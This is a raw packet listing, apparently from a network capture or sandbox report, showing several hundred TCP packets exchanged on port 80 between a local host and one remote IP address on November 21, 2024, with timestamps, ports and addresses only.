Nov 21, 2024 01:20:47.920572042 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.920638084 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.920685053 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.920737028 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.922169924 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.922225952 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.922290087 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.922352076 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.923695087 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.923753023 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.923815012 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.923870087 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.925221920 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.925283909 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.925357103 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.925412893 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.926788092 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.926841974 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.926841974 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.926945925 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.928344011 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.928400993 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.928436041 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.928487062 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.929894924 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.929958105 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.930042028 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.930095911 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.935206890 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.935262918 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.935333014 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.935379982 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.936036110 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.936103106 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.936187983 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.936233997 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.937612057 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.937664986 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.937736988 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.937789917 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.939086914 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.939137936 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.939208031 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.939258099 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.940675020 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.940727949 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.940727949 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.940776110 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.942118883 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.942173004 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.942239046 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.942290068 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.943605900 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.943660021 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.943680048 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.943723917 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.945029020 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.945081949 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.945117950 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.945163965 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.946460009 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.946516037 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.946579933 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.946625948 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.947846889 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.947958946 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.947988987 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.948007107 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.949246883 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.949306965 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.949362040 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.949409962 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.950602055 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.950650930 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.950719118 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.950762033 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.951976061 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.952033043 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.952104092 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.952121973 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.953263044 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.953320026 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.953335047 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.953383923 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.954547882 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.954597950 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.954657078 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.954699993 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.955852985 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.955904007 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.955921888 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.955969095 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.957160950 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.957204103 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.957309961 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.957356930 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.958427906 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.958473921 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.958540916 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.958590984 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.959666014 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.959716082 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.959732056 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.959780931 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.960915089 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.960966110 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.961005926 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.961042881 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.962174892 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.962296009 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.962322950 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.962338924 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.963421106 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.963473082 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.963542938 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.963602066 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.964627981 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.964668989 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.964739084 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.964782953 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.965873957 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.965923071 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.966062069 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.966113091 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.967025995 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.967086077 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.967130899 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.967180014 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.968189955 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.968235016 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.968275070 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.968333960 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.969322920 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.969373941 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.969433069 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.969485998 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.970489025 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.970541954 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.970704079 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.970750093 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.971637964 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.971688032 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.971735954 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.971791983 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.972791910 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.972841024 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.972982883 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.973092079 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:47.973881960 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:47.973928928 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.098011017 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.098110914 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.124866962 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.124924898 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.124963045 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.125019073 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.212183952 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.212353945 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.217642069 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.217706919 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.245225906 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.245263100 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.245451927 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.333676100 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.333738089 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.333774090 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.333825111 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.333842039 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.333863020 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.333885908 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.333885908 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.333910942 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.333915949 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.333966970 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.333972931 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334002018 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334028006 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334037066 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334049940 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334074020 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334096909 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334126949 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334134102 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334161043 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334182978 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334222078 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334232092 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334284067 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334294081 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334317923 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334347963 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334369898 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334371090 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334371090 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334405899 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334436893 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334436893 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334448099 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334465981 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334482908 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334508896 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334517002 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334527969 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334568024 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334587097 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334604025 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334619999 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334639072 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334654093 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334673882 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334701061 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334708929 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334743977 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334769011 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334777117 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334789038 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334806919 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334811926 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334824085 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334846973 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334876060 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334882021 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334904909 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334918022 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334933996 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334933996 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334954023 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.334968090 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.334988117 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335009098 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335026979 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335045099 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335061073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335094929 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335097075 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335097075 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335129976 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335155010 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335165024 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335180998 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335201025 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335218906 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335236073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335259914 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335289955 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335289955 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335341930 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335346937 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335382938 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335416079 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335416079 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335438013 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335469961 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335474968 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335504055 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335525036 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335539103 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335563898 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335575104 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335591078 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335609913 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335632086 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335644960 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335679054 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335694075 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335694075 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335716963 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335724115 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335752964 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335768938 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335788012 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335802078 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335822105 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335838079 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335876942 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.335937977 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335972071 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.335999012 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336007118 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336021900 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336044073 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336062908 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336080074 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336107969 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336116076 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336126089 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336148977 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336175919 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336184025 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336199999 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336219072 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336244106 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336255074 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336282969 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336307049 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336317062 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336354017 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336371899 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336405039 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336414099 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336440086 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336462975 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336473942 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336492062 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336513042 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336533070 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336546898 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336570978 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336582899 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336601973 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336616993 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336638927 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336651087 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336679935 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336685896 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336707115 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336721897 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336750031 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336750031 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336756945 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336771965 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336793900 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336828947 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336843967 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336843967 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336864948 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336874962 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336899996 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336926937 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336935997 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336950064 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.336971045 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.336990118 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337007999 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337022066 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337047100 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337064981 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337081909 CET	80	49165	192.3.243.136	192.168.2.22
Nov 21, 2024 01:20:48.337110996 CET	49165	80	192.168.2.22	192.3.243.136
Nov 21, 2024 01:20:48.337121010 CET	80	49165	192.3.243.136	192.168.2.22
